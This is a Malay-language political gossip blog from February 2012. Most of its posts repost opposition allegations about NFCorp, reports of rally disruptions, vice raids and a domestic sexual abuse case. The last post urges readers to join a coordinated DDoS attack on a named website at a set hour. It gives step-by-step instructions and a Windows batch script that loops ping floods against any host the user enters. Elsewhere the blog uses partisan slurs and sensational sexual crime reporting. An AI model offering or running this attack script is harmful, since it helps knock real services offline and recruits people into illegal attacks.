Dey Macha

dsp160519

dsp231112
IKLAN BANNER RM30-TEKS RM10 SEBULAN biaqpila(at)gmail.com



Rabu, Februari 29, 2012

LIVE: FILIPINA VS MALAYSIA





PERLAWANAN TAMAT
FULL TIME: PHILIPPINES 1-1 MALAYSIA
INTERNATIONAL FRIENDLY GAME

KONGSI ARTIKEL INI MELALUI FACEBOOK

NFCorp terlibat perniagaan pasaraya mewah di Singapura



(Oleh: Sidiqin Omar)


 


PETALING JAYA 28 Feb: KEADILAN hari ini mendedahkan National Feedlot Corporation(NFCorp) turut terlibat dalam perniagaan pasaraya mewah di Singapura, selain tiga buah restoran dan pelaburan RM44 juta kondominium di republik itu.


Menurut Pengarah Strategi KEADILAN, Rafizi Ramli, perniagaan itu dikendalikan syarikat Farmhouse Supermarkets Pte Ltd yang dimiliki suami Datuk Seri Shahrizat Jalil – Datuk Seri Mohamad Salleh Ismail dan dua anak mereka, Wan Shahinur Izram Salleh dan Wan Izrarana Fatimah Zabedah.


Siasatannya mendapati Farmhouse Supermarkets Pte Ltd menjadi penyewa utama kepada kompleks pasaraya mewah Star Vista, di kawasan elit berdekatan Nanyang Technology University.


“Pasaraya yang diusahakan oleh Farmhouse Supermarkets Pte Ltd ini dijangka mula beroperasi dalam suku ketiga tahun ini, apabila kompleks Star Vista siap,” jelas beliau dalam sidang media di Ibu Pejabat KEADILAN hari ini.


Syarikat itu juga, katanya, telah menandatangani perjanjian sewaan dengan pemaju, CapitalMalls bagi 28 unit ruang kedai di kompleks tersebut.


Sewa ruang kedai yang setiap satu berkeluasan 3,000 meter persegi itu dianggar mencecah S$900,000 sebulan atau RM2.2 juta, mengikut harga pasaran semasa.


“Sudah tentu perniagaan pasaraya ini akan dibiayai oleh dana awam yang disalurkan bagi tujuan penternakan lembu seperti yang dimandatkan oleh NFC, seperti yang berlaku di dalam pembelian-pembelian aset mewah lain sebelum ini,” tegasnya.


Sehubungan itu, katanya, KEADILAN mendesak NFC menjelaskan komitmen kewangan yang telah dibuat melalui Farmhouse Supermarkets Pte Ltd, termasuk perjanjian sewaan yang telah dimeterai.


“Tindakan tegas perlu dilakukan segera untuk merampas kembali kesemua dana yang telah diselewengkan secepat mungkin dan mendakwa individu terbabit di mahkamah atas tuduhan pecah amanah dan jenayah perdagangan.


“Jika ini tidak berlaku dalam minggu ini, KEADILAN akan melakukan pendedahan setiap minggu hinggalah Dewan Rakyat bersidang pertengahan bulan Mac ini,” tegas beliau.

-KD



KONGSI ARTIKEL INI MELALUI FACEBOOK

AKSI SEKS TEPI SURAU


KOTA DAMANSARA - Tindakan sepasang pelajar asing membuat hubungan seks di dalam kereta di tepi sebuah surau di Seksyen 6, kelmarin mengundang kemarahan penduduk setempat.

Perbuatan tidak senonoh pasangan warga Afrika disedari oleh seorang ahli jawatankuasa surau yang kebetulan melalui blok rumah yang menempatkan asrama pelajar sebuah kolej kira-kira jam 10 pagi.

Kelakuan tersebut menyebabkan penduduk berang dan bertindak memancitkan tayar kereta tersebut.

Ahli Jawatankuasa Surau An-Nur Flat Gugusan Seroja, Harun Ali berkata, dia sangsi selepas melihat kereta Myvi berwarna putih di letakkan di parkir blok berkenaan bergoyang.

“Bila saya pergi lihat di tingkap kereta terbabit, saya lihat pasangan warga Afrika sedang melakukan hubungan seks di belakang kereta,” katanya.-SH

KONGSI ARTIKEL INI MELALUI FACEBOOK

No Plat WWW Boleh Di Tempah Mulai 30 April 2012

Orang ramai yang menantikan nombor pendaftaran kenderaan “WWW” yang membawa maksud “World Wide Web” dijangka boleh membuat tempahan di Jabatan Pengangkutan Jalan Wilayah Persekutuan Kuala Lumpur pada 30 April 2012.

Menteri Pengangkutan Datuk’ Seri Kong Cho Ha berkata, tempahan akan dibuka selama 14 hari dari jam 8 pagi hingga 12 tengahari dan ditutup pada jam 12 tengahari 14 Mei 2012.Beliau percaya tempahan terhadap nombor pendaftaran WWW bukan sahaja akan mendapat sambutan hangat daripada orang ramai dan juga akan mencatat harga tempahan yang paling tinggi di sejarah tempahan terhadap nombor pendaftaran kenderaan di negara kita.

Buat masa kini, harga tempahan nombor pendaftaran kenderaan “MCA 1” merupakan harga tempahan nombor pendaftaran kenderaan yang paling tinggi, harganya ialah RM300,100.00.Beliau menambah bahwa pendapatan Jabatan Pengangkutan Jalan setiap tahun dari tempahan terhadap nombor pendaftaran kenderaan puratanya adalah sebanyak RM1.7 million.Pada tahun 2010, pendapatan JPJ dari tempahan terhadap nombor pendaftaran kenderaan adalah hampir RM1.6 million.Pada tahun 2011, telah melebihi 1.8 million.

Beliau berkata, terdapat empat kategori nombor yang boleh ditempah iaitu nombor bernilai utama, nombor menarik, nombor popular dan nombor semasa.Nombor bernilai utama iaitu nombor satu angka (1-10) akan dibuka dengan harga jualan minimum RM 10,000, manakala nombor menarik dijual dengan harga minimum RM 2,000.Nombor popular dan nombor semasa masing-masing dibuka dengan harga minimum RM 300.“Kita telah menerima banyak pertanyaan dan panggilan telefon tentang nombor pendaftaran WWW. Salah satu sebab kenapa mereka mahu sangat nombor itu kerana ia membawa maksud World Wide Web,” katanya.

Beliau juga menperingatkan mereka yang ingin menempah nombor pendaftaran WWW supaya mengikut procedur yang ditetapkan oleh JPJ, termasuk mengisi borang dan membayar deposit yang ditetapkan.Borang tempahan nombor pendaftaran boleh dimuat turun dari portal JPJ, iaituwww.jpj.gov.my-28/2/2012*gambarhiasan -agendadaily
Published with Blogger-droid v1.7.4


KONGSI ARTIKEL INI MELALUI FACEBOOK

Selasa, Februari 28, 2012

PONDAN UMNO!!! Gambar Samseng Taik Kucing UMPORNO yang cuba menumbuk Nurul Izzah tersebar


Nurul Izzah dilaporkan hampir dipukul sewaktu ceramah di Felda Lepar Hilir oleh samseng-samseng yang mengganggu ceramah Pakatan Rakyat itu.

Kini, lelaki yang menyerang Nurul Izzah telahpun dikenal pasti melalui gambar diatas. Gambar tersebut telah diperolehi melalui ruangan laman twitter yang kini ligat berlegar.

Laporan polis juga telah dibuat, semoga pihak berkuasa mengambil tindakan yang tegas dan segera agar kejadian yang sama tidak berulang lagi.

  • Lagi ceramah diganggu, Nurul nyaris jadi mangsa
  • 9:03AM Feb 27, 12
  • Satu lagi usaha mengganggu ceramah Pakatan Rakyat dilaporkan malam semalam dan kali ini kejadian berlaku di Felda Lepar Hilir I, Gambang, Pahang.

    Kali ini, yang nyaris menjadi mangsa kali ini adalah Pengarah Komunikasi PKR Nik Nazmi Nik Ahmad (bawah, kiri) dan Naib Presiden parti itu, Nurul Izzah Anwar.

    NONECeramah itu didakwa diganggu oleh ahli Umno yang dengan sengaja memasang pembesar suara di sebuah kedai kopi di mana Nurul Izzah dan Nik Nazmi dijadual berucap mulai jam 9 malam hingga tengah malam.

"Pemimpin PKR tempatan telah mendapat kelulusan polis untuk kita berucap ... tetapi sebelum majlis bermula mereka menerima ugutan menerusi khidmat pesanan ringkas (SMS) yang mahu mereka membatalkan ceramah itu.

"Sepanjang ucapan saya kira-kira 20 hingga 30 minit, mereka memainkan lagu dan muzik dengan kuat bagi mengalihkan perhatian orang ramai.

"Pada mulanya, kami sangka bunyi itu datangnya dari konsert, kemudian, kami dapati bahawa mereka sebenarnya menganjurkan satu sesi karaoke," katanya.

Keadaan semakin tidak terkawal apabila tiba giliran Nurul Izzah untuk berucap, kata Nik Nazmi, dengan kumpulan itu mula menyerbu ke lokasi ceramah sambil mencaci dan melemparkan kata-kata kesat kepada anak perempuan ketua umum PKR itu.

NONE"Budak-budak muda cuba pukul Nurul Izzah di ceramah kami di Felda Lepar Hilir. Saya dan Nurul Izzah diiringi polis keluar untuk elak samseng Umno," kata Nik Nazmi.

Nurul Izzah (kanan) pula dalam raeksi awalnya berkata beliau bersyukur kerana selamat tetapi memberi jaminan tidak akan gentar dengan gelagat liar berkenaan.

"Bersyukur pulang dgn selamat. Moga teman-teman di Felda Lepar Hilir juga bertahan dan bersemangat walaupun samseng-samseng Umno berlagak liar, ugut fizikal.

"Tangan (penumbuk) hanya beberapa inci dari (wajah) saya," katanya di Twitter pada jam 1 pagi ini.

Skim penempatan Felda itu terletak di kawasan parlimen Paya Besar dan kini dipegang oleh Abdul Manan Ismail dari Umno.

Sehubungan itu, Nik Nazmi dan Nurul Izzah akan membuat laporan di balai polis Merchant Square berdekatan ibu pejabat PKR pada jam 3 petang hari ini.

adam chew kwong wah jit poh journalist fracas in penang himpunan hijau rallyKejadian itu hanya salah satu daripada siri gangguan dalam beberapa bulan kebelakangan ini apabila pemimpin Pakatan cuba menggempur kubu-kubu BN, khususnya Umno menjelang pilihan raya umum akan datang.

Semalam, perhimpunan solidariti Himpunan Hijau di Sudut Pidato, Padang Kota, Esplanade yang dihadiri Ketua Menteri Lim Guan Eng turut diganggu oleh kumpulan yang dianggotai oleh pemimpin Pemuda Umno dan kumpulan pendesak Melayu, PERKASA.

20 Februari lalu, kereta Ketua Pembangkang Datuk Seri Anwar Ibrahim diserang dengan lontaran batu, kayu dan mercun sehingga kemek dan cerminnya pecah ketika berceramah di Jalan Mersing, Sembrong.

NONE13 Februari pula kunjungan Anwar ke Felda Tun Ghafar Baba, di Machap, Alor Gajah juga dicemari oleh penyokong Umno yang mengganggu ceramah beliau.

Awal bulan ini pula sekatan jalan raya didirikan daripda menghalang pemimpin dan penyokong Pakatan daripada menghadri ceramah yang dijadualkan di kubu Perdana Menteri Datuk Seri Najib Razak di Pekan.




paspb2

KONGSI ARTIKEL INI MELALUI FACEBOOK

Hidang Video Lucah Untuk Pelanggan



DEY MACHA!!!
HARI-HARI ADA SAJA KENA CEKUP
TAPI DOK ESOK JADI PELACUR BALIK
PI MAI PI MAI DOK TANG TU JUGAK
YANG HERAN TOKEY DIA DEPA TAK TANGKAP PULAK
DAH TERANG2 TAK DAK LESEN PUN LEPAIH
KAH! KAH! KAH!

KAJANG - Seramai lapan tukang urut warga Thailand dicekup dalam dua operasi berasingan, selepas dikesan menawarkan bukan sahaja perkhidmatan seks kepada pelanggan, malah turut menyediakan tayangan video lucah sebagai tarikan untuk memastikan premis kekal laris.

Dalam serbuan pertama, polis menyerbu sebuah pusat rawatan kesihatan terletak di tingkat dua Plaza Perdana, Taman Sepakat Indah, kira-kira jam 9.30 malam, kelmarin dan menahan empat wanita warga Thailand bekerja sebagai tukang urut di premis terbabit.

Siasatan menunjukkan empat wanita berusia 32 hingga 45 tahun itu menawarkan urutan serta khidmat seks dengan menyajikan tayangan­ video lucah dipercayai untuk merangsang pelanggannya.

Ketua Polis Daerah Kajang, Asisten Komisioner Ab Rashid Ab Wahab berkata, pemeriksaan ke atas premis menemui kondom dan pelbagai jenis cakera padat digital (DVD) lucah dipercayai sebagai bahan tontonan untuk pelanggan.

“Dalam serbuan sama, kita tahan seorang lelaki tempatan yang merupakan penjaga premis serta dua pelanggan berusia 30-an. Pemeriksaan lanjut mendapati wanita asing itu menjalankan kegiatan haram terbabit sejak sebulan lalu dan mengenakan bayaran RM150 sehingga RM200 kepada pelanggan yang ingin mendapatkan khidmat seks,” katanya.

Beliau berkata, premis dilengkapi kamera litar tertutup (CCTV) itu, tidak mempunyai lesen sah untuk beroperasi, manakala siasatan terhadap empat wanita terbabit mendapati mereka menyalahgunakan pas lawatan sosial.

Sementara itu, dalam operasi berasingan, Ab Rashid berkata, sepasukan anggota polis juga dari Bahagian Siasatan Jenayah Perjudian, Maksiat dan Kongsi Gelap (D7) Ibu Pejabat Polis Daerah (IPD) Kajang menyerbu sebuah rumah urut di Batu 11 di sini, yang dikesan turut menjalankan kegiatan tidak bermoral.

Menurutnya, empat tukang urut warga Thailand berusia 30-an itu ditahan bersama seorang penjaga premis tempatan.

“Hasil soal siasat awal mendapati rumah urut terbabit juga tidak memiliki lesen sah dan baru beroperasi hampir dua bulan,” katanya.

Beliau berkata, operasi berterusan akan dilakukan bagi menyekat kegiatan tidak bermoral ini..-SH

KONGSI ARTIKEL INI MELALUI FACEBOOK

SIMPAN JE LA JANJI TU NAJIB...


GORENG JANGAN TAK GORENG


DEY MACHA!!!
PASAI PA KENA TUNGGU MENANG 2/3 BARU BOLEH PINDA?
KALAU IANYA UNTUK KEBAIKAN RAKYAT
BUAT LA NI PUN BOLEH
PAKATAN RAKYAT PUN AKAN SOKONG USUL TU
TAK PAYAH LA NAK KELENTONG
BILA MENANG 2/3 BARU NAK BUAT
CAKAP BIAQ PAKAI OTAK SIKIT
KAH! KAH! KAH!

KENA MENANG 2/3 BARU NAK BERLAKU ADIL KOT?
PATUTLA KES LEMBU KONDO TAK SETEL-SETEL LAGI
RUPANYA RAKYAT KENA GORENG DULU
KAH! KAH! KAH!


PM janji lebih kuasa bagi SPRM jika BN dapat 2/3

BN terus menaburkan janji pilihan raya hari ini dengan Perdana Menteri Datuk Seri Najib Razak  berkata sekiranya mereka merampas kembali majoriti dua pertiga di Dewan Rakyat pada pilihan raya umum akan datang,

NONEAntaranya, Najib yang juga pengerusi BN itu berkata Suruhanjaya Pencegahan Rasuah Malaysia (SPRM) akan diberi lebih kebebasan.

Sebuah Suruhanjaya Perkhidmatan Anti Rasuah, seperti yang dicadangkan oleh lembaga penasihat SPRM, akan ditubuhkan untuk membolehkan badan pemantau anti-rasuah itu mempunyai kawalan penuh ke atas pegawai-pegawainya, termasuk kuasa untuk melantik dan memecat mereka, katanya.

"Saya bersetuju dengan pandangan lembaga penasihat SPRM bahawa untuk mencerminkan kebebasan SPRM, sebuah Suruhanjaya Perkhidmatan Anti Rasuah perlu diwujudkan. Suruhanjaya ini akan diberi kuasa untuk melantik dan memecat kakitangan SPRM.

"Tetapi isu ini perlu pindaan perlembagaan. Insya-Allah jika BN diberi mandat dua pertiga dalam pilihan raya umum ke-13 yang akan datang, pindaan perlembagaan akan dijalankan dan suruhanjaya ini akan ditubuhkan," kata Najib semasa merasmikan Program Pegawai Integriti Bertauliah di Putrajaya hari ini.

NONEBuat masa ini, kakitangan SPRM adalah di bawah bidang kuasa Suruhanjaya Perkhidmatan Awam, sama seperti semua agensi kerajaan yang lain.

Antara perkara lain yang juga dipertimbangkan oleh kerajaan, kata Najib, adalah status Ketua Pesuruhjaya SPRM, yang boleh dinaik taraf mengikut perlembagaan seperti jawatan Peguam Negara, Ketua Audit Negara dan hakim-hakim, untuk memastikan kebebasan dan ketelusan.-MK


KONGSI ARTIKEL INI MELALUI FACEBOOK

Ditahan ISA kerana ‘molotov coctail’ tapi disoal siasat isu politik


(Mohd Martin Kahar)
KUALA LUMPUR: Saksi pendakwaa kes saman terhadap kerajaan Malaysia yang dikuasai Umno Barisan Nasional (BN), Saari Sungip mendedahkan, sebahagian besar soal siasat sepanjang dua tahun ditahan mengikut Akta Keselamatan Dalam Negeri (ISA), adalah soal politik untuk meyakinkan beliau supaya tidak menjadi penyokong politik pembangkang.
Beliau yang kini Ahli Dewan Undangan Negeri (Adun) Hulu Klang, menafikan terlibat dengan aktiviti militan dan tiada kaitan dengan kenyataan Ketua Polis Negara (KPN) ketika yang menyatakan mereka mengeluarkan senjata api dan molokov koktel.
“Secara realitinya, kami tidak tahu apa yang berlaku. Kami hanya tahu selepas kami dihantar ke kem Kemunting.
“Selepas dua bulan, barulah kami tahu sebab penahanan ialah tuduhan berdasarkan kenyataan KPN, Tan Sri Norian Mai, kononnya kami cuba melancarkan serangan ke atas kerajaan Malaysia,” katanya.
Mahkamah Tinggi Kuala Lumpur hari ini memulakan prosiding perbicaraan bekas tahanan ISA terhadap Kerajaan Malaysia dan Norian Mai berikutan penahanan yang tidak mengikut undang-undang.
Selain Saari, mereka yang memfail saman ialah Tian Chua, Hishamuddin Rais, Saari Sungip, Dr Badrulamin Bahron, Abdul Ghani Haroon, N Gobalakrisnan dan Badaruddin Ismail.
Pada 2001, mereka ditahan di bawah ISA atas tuduhan merancang untuk menjatuhkan kerajaan secara kekerasan dengan memiliki senjata berbahaya seperti molotov coctail dan grenade launcher.
Panel hakim Mahkamah Persekutuan, Mohamed Dzaidin, Abdul Malik Ahmad dan Siti Norma Yaakob pada 6 September 2002 kemudian memutuskan mereka tidak bersalah dan penahanan mereka dianggap ‘malafide’(berniat jahat).
Bagaimanapun, kerajaan Umno BN tidak menerima pakai keputusan itu dan mengarahkan mereka ditahan mengikut Seksyen 73, ISA selama dua tahun sehingga 2003.-KD



KONGSI ARTIKEL INI MELALUI FACEBOOK

Isnin, Februari 27, 2012

Panas!!! Aksi Seks Ibu Bapa Ditiru Anak Sendiri


KANGAR – Neraka dunia. Itu yang terpaksa diharungi seorang penjawat awam wanita berusia 30-an apabila sering dipaksa suaminya yang juga berusia 30-an melakukan aksi seks, termasuk luar tabii di hadapan ketiga-tiga anak mereka di ruang tamu rumah sejak tujuh tahun lalu.

Lebih menjijikkan suami bernafsu binatang itu juga gemar merakam aksi ‘bersama’ mereka sejak malam pertama perkahwinan sehingga kini.

Sumber berkata, lebih mengaibkan mangsa, anak perempuan mereka yang berusia tujuh tahun sering melakonkan kembali adegan seks itu bersama abang sulungnya berusia 15 tahun.

Katanya, hati ibu mana yang tidak hancur melihat perbuatan jijik suami yang merosakkan ketiga-tiga anak mereka berusia tujuh hingga 15 tahun itu.

“Mangsa mendakwa dia sudah diperlakukan sedemikian sejak berkahwin dengan suaminya lebih 15 tahun lalu, malah pada malam pertama aksi mereka di dalam bilik dirakam suaminya menggunakan telefon bimbit dan kamera video.

“Namun, selepas mendapat cahaya mata, suaminya bertambah pelik dengan memaksanya melakukan aksi bersama termasuk di luar tabii di hadapan ketiga-tiga anak mereka,” katanya.

Kata sumber itu, jika si isteri enggan menuruti kemahuan gila suami, dia dibelasah.

Dia berkata, lelaki terbabit baru saja berkahwin lain awal bulan lalu dengan seorang wanita dari negara jiran, namun sikap jijiknya melayan mangsa tidak berubah.

“Suami mangsa juga bukan saja merakamkan aksi seks mereka, malah aksi mangsa yang membuang air kecil di dalam tandas juga dirakam bagi tujuan koleksi.

“Daripada pengakuan mangsa, suaminya sudah mempunyai banyak koleksi rakaman aksi ‘bersama’ mereka dan tidak mengetahui tujuan dia bertindak demikian,” katanya.

Tidak tahan dengan tabiat buruk suaminya, wanita berkenaan memohon fasakh untuk bercerai dan membuat laporan polis awal bulan lalu.

Sementara itu, Pengarah Jabatan Pembangunan Wanita Negeri (JPWN) Perlis, Muhamad Hazimin Jamaludin berkata, kes penderaan wanita berlaku berdasarkan pelbagai faktor.

Katanya, kes penderaan seksual kebanyakannya berpunca daripada suami yang terpengaruh dengan bahan video lucah yang ditontonnya.

“Mereka mungkin terdedah dengan bahan lucah ini selepas ia terlalu mudah didapati dan pendedahan itu akan memberi kesan kepada perubahan seksual mereka, termasuk mencubanya ke atas isteri,” katanya.

Menurutnya, sebarang kes yang diterima disiasat dan memberi khidmat prakaunseling dalam usaha memberi maklumat mengenai tindakan yang perlu diambil.

Pihaknya juga sedar mangsa trauma akibat nafsu buas suami yang jika tidak dituruti mengundang kepada penderaan fizikal.

“Kami akan membantu daripada segi kaunseling, termasuk mengemukakan masalah kepada pihak berkuasa seperti Mahkamah Syariah atau jabatan berkaitan.

“Jika orang ramai yang berasakan diri mereka didera, mereka boleh tampil membuat aduan untuk bantuan,” katanya.

Mengulas kes terbabit, Ketua Polis Daerah Padang Besar, Superintendan Che Man Md Dros ketika dihubungi mengesahkan menerima laporan mangsa.

Menurutnya, polis sudah menyerahkan laporan kepada Jabatan Agama Islam Perlis bagi tindakan lanjut kerana ia di bawah bidang kuasa mereka.

“Wanita berkenaan membuat laporan polis, tetapi ia lebih menjurus kepada masalah rumah tangga dengan suaminya,” katanya. -hmetro.com

mynewshub



KONGSI ARTIKEL INI MELALUI FACEBOOK

LEMBU NAIK WIRA

KULIM: Nasib nyata tidak menyebelahi dua lelaki apabila tindakan mereka mencuri dua lembu dengan menyumbatnya dalam Proton Wira Aeroback tidak berjaya apabila kenderaan terbabit terbabas dalam longkang di Kawasan Industri Kelang Lama di sini, semalam.

Kejadian berlaku jam 3.30 pagi menyebabkan dua lelaki berusia 20-an itu berputih mata apabila terpaksa melarikan diri meninggalkan kereta mereka bagi mengelak dicekup pihak berkuasa.Sumber berkata, polis menerima maklumat daripada orang ramai mengenai sebuah kereta terbabas dalam longkang di hadapan sebuah kilang di kawasan berkenaan.

Menurutnya, kereta terbabit dipercayai dipandu laju, hilang kawalan akibat jalan licin dan tersekat dalam longkang terbabit.“Kedua-dua mereka melarikan diri meninggalkan dua lembu itu dalam keadaan lali.“Pemeriksaan lanjut mendapati tempat duduk belakang diubah suai.

Kerusinya dibuang memudahkan mereka menyumbat lembu terbabit.“Dua ekor lembu termasuk seekor anak yang ditemui dalam kereta itu lemah kesan ubat pelali,” katanya.Menurutnya, polis turut menemui dua batang sumpit dan ubat pelali yang dipercayai digunakan suspek untuk menangkap lembu terbabit.“Polis belum mengesan pemilik dan lokasi haiwan berkenaan dicuri.

Kami kini sedang menjejaki kedua-dua suspek yang menghilangkan diri bagi membantu siasatan,” katanya.Sementara itu, Ketua Polis Daerah Kulim, Superintendan Ghuzlan Saleh ketika dihubungi mengesahkan kejadian itu.
Published with Blogger-droid v1.7.4

Himpunan Hijau di Pulau Pinang diganggu BERUK UMPORNO


Semua Himpunan Hijau 2.0 yang diadakan di seluruh negara bagi membantah keputusan kerajaan membenarkan loji pemprosesan nadir bumi milik Lynas Advanced Material Plant (Lamp) beroperasi di Gebeng, Pahang berjalan lancar kecuali di Pulau Pinang.

penang himpunan hijau 2 260212 03Himpunan Hijau di Sudut Pidato, Padang Kota, Esplanade itu dicemari apabila kira-kira 50 orang, termasuk pemimpin tempatan dari Pemuda Umno dan kumpulan pendesak Melayu, PERKASA mengganggu acara yang dijalankan itu.

Ketika acara itu dimulakan pada jam 6 petang, kumpulan itu mula menjerit kepada orang ramai yang berhimpun secara aman itu dan memberi amaran kepada mereka bahawa isu Lynas itu bukan "isu Pulau Pinang" dengan  melaungkan slogan "Hidup Umno", "Kami mahukan kebebasan" dan "Balik Kuantan (Kembali ke Kuantan)".

Kira-kira 500 penyokong Himpunan Hijau kemudian membalas dengan laungan "Hidup Rakyat”.

penang himpunan hijau 2 260212 02Selepas 15 minit berlalu keadaan semakin tegang, namun tidak ada kelibat polis dilaporkan memantau keadaan.

Ketua Menteri Pulau Pinang Lim Guan Eng tiba kira-kira jam 6:30 petang dan berucap kepada hadirin bahawa Pakatan Rakyat berpendirian tegas bahawa tidak akan menyokong kilang penapisan nadir bumi bernilai RM700 juta yang dibina di Gebeng, dekat Kuantan itu kerana bahaya pencemaran bahan radioaktif.

Beliau juga menggesa rakyat yang hadir supaya tidak diperbodohkan dan digertak oleh kumpulan yang berkumpul berhampiran.

Wartawan dibelasah

Apabila mendengar nasihat Lim itu, kumpulan berkenaan terus mencaci Lim dan melemparkan kata-kata kesat ke atas setiausaha agung DAP itu. Para hadirin kemudian bertindak dengan mem-boo mereka.

penang lynas himpunan hijau 260212Berikutan itu, Lim mula meninggalkan pentas dan menyertai orang ramai tetapi kumpulan itu mula mengasak para hadirin sehingga mengakibatkan berlakunya pertengkaran.

Menurut orang saksi, seorang wartawan dan seorang jurugambar sebuah akhbar berbahasa Cina cedera didakwa dipukul dengan topi keledar.

Mereka dikenal-pasti sebagai wartawan dan jurugambar akhbar Kwong Wah Jit Poh iaitu Andrew Chew, 29, dan Lee Hong Chun, 25, masing-masing cedera di bahagian badan dan kepala.

penang crime police lim guan eng event pc 260908 ayub yaakobMereka kini dirawat di Hospital Pulau Pinang (HPP).

Pihak polis akhirnya tiba pada jam 7:15 malam dan menagarahkan orang ramai supaya bersurai.

Sementara itu, menurut laporan Benama, Ketua Polis Negeri Datuk Ayub Yaakob berkata penganjur langsung tidak memaklumkan kepada polis mengenai acara itu sehingga berlaku kekecohan.

"Memang tidak memerlukan permit tetapi sepatutnya penganjur memaklumkan atau berunding dengan pihak polis berhubung perhimpunan berkenaan supaya polis dapat bersiap sedia atau menempatkan anggota di kawasan berkenaan bagi mengelak sebarang perkara tidak diingini berlaku.

"Bila berlaku kekecohan, baru penganjur maklumkannya dan mereka juga cuba menyalahkan polis kerana lambat bertindak," katanya.

NONETidak seperti Pulau Pinang, perhimpunan solidariti di bandar-bandar utama tempat lain berjalan dengan lancar.

Di BUKIT MERAH, Perak kira-kira 1,000 orang berkumpul di bekas tapak penapisan Asian Rare Earth (ARE) pada jam 11 pagi. Mereka berhimpun selama 90 minit untuk menunjukkan sokongan kepada rakan-rakan di Kuantan.

Penganjur perhimpunan itu Hew Yoon Tat, ketika dihubungi, berkata beliau memberikan ucapan pada majlis itu di mana beliau mengingatkan orang ramai bahawa kerja-kerja pembersihan terhadap projek yang terbelangkai itu sekarang masih berterusan dan menimbulkan bahaya.

Gunting rambut

"Kerajaan harus menguatkuasakan larangan menyeluruh terhadap kilang pemprosesan nadir bumi," katanya.

NONEDi KUALA LUMPUR, kira-kira 500 orang berkumpul di hadapan pusat membeli-belah Maju Junction sepanjang Jalan Tunku Abdul Rahman dalam perhimpunan tiga jam.

Perhimpunan diadakan dalam suasana seolah-olah peserta sedang berpesta dengan mereka  menyanyikan lagu-lagu dan memaparkan sepanduk kepada kenderaan yang melalui jalan berkenaan. Bunyi hon sebagai menyokong perhimpunan itu menjadikan suasana sebegitu bising.

Selain daripada pertunjukan muzikal, sesetengah peserta juga menderma sebahagian kecil rambut mereka yang digunakan untuk mengeja perkataan "Hentikan Lynas, Selamatkan Malaysia" di kaki lima.

NONEDi KUCHING, Sarawak, kira-kira 30 orang berhimpun di Taman Sahabat, Jalan Song. Bagaimanapun perhimpunan itu terpaksa dipendekkan kepada hanya 15 minit kerana hujan lebat.

Penganjur William Lee menarik perbandingan antara kilang Lynas dan kilang melebur aluminium di Balingian, Sarawak yang katanya telah menyebabkan beberapa tumbuhan sekitar lingkungan 3km mati.

Beliau memberi amaran bahawa perkara yang sama mungkin berlaku di Gebeng.

Terdapat juga laporan perhimpunan solidariti juga diadakan di Tawau, Kota Kinabalu, Sibu, Miri, Kluang dan juga sejauh Melbourne.

-MK


KONGSI ARTIKEL INI MELALUI FACEBOOK

LIVERPOOL JUARA PIALA CARLING


LONDON - Liverpool mengatasi Cardiff City 3-2 menerusi tendangan penalti untuk menjulang Piala Carling di Stadium Wembley di sini, sekali gus mengakhiri kemarau kejuaraan yang berlarutan sejak enam tahun lalu.

Kedua-dua pasukan terikat 2-2 pada masa tambahan permainan berikutan gol minit-minit terakhir Cardiff City, pasukan yang kini dimiliki oleh ahli perniagaan dari Malaysia.

Kemenangan hari ini merupakan kali kelapan bagi Liverpool, pasukan pimpinan Kenny Dalgish. Malah ia juga merupakan perlawanan akhir kali yang ke-21 bagi Liverpool di Stadium Wembley.

Pertemuan peringkat awal kedua-dua pasukan dikuasai oleh Cardiff City menerusi jaringan Joe Mason pada minit ke-19. Liverpool menjaringkan gol penyamaan, menerusi Martin Skrtel, pada minit ke-60, sekali gus menyebabka permainan berlarutan sehingga masa tambahan.

Liverpool menambah jaringan pada separuh masa pertama waktu tambahan untuk meletakkannya 2-1. Gol dijaringkan oleh Dirk Kuyt pada minit ke-108.

Cardiff City yang tidak berputus asa menjaringkan gol penyamaan pada minit ke-118, memaksa kejuaraan ditentukan menerusi tendangan penalti.

SH



KONGSI ARTIKEL INI MELALUI FACEBOOK

Ahad, Februari 26, 2012

WEBSITE BAKAR AL-QURAN - JOM SERANG SAMPAI LINGKUP!!!!

Demo membantah dan mengutuk tindakan tentera syaitan Amerika membakar Al-Quran baru2 ni tidak mencukupi jika anda tak bersama kami menjahanamkan satu portal yang cukup menghina dan mengguris umat islam iaitu http://www.burn-the-koran.com/dengan cara serangan DDOS atau Distributed Denial of Service.

Pihak kami sedang bertungkus lumus untuk menghancurkan website ini dan sementara itu kami memerlukan bantuan anda untuk menyertai kami dalam jihad kecil ini. Untuk mereka yg tidak tahu disini saya turunkan cara paling mudah untuk serangan ini. iaitu membuat aplikasi DDOS (Distributed Denial of Service) dengan bantuan Batch File. Semoga usaha kita ini diberkati Allah S.W.T ...... TAKBIR !!

Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !


Sila ikut Step By Step :


.::[Cara Pembuatan]::.




1) Buka notepad




2) Copy Code yg di bold dibawah ini

@echo off



mode 67,16



title DDOS Attack by d43n91n3



color 0a

cls

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo DDOS With Batchfile


echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo.

set /p x=Server-Target:

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



ping %x%



echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


@ping.exe 127.0.0.1 -n 5 -w 1000 > nul


goto Next

:Next

echo.

echo.


echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 0c

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS


3) Paste code tersebut kedalam notepad anda


4) Save as file tersebut pilih all file.

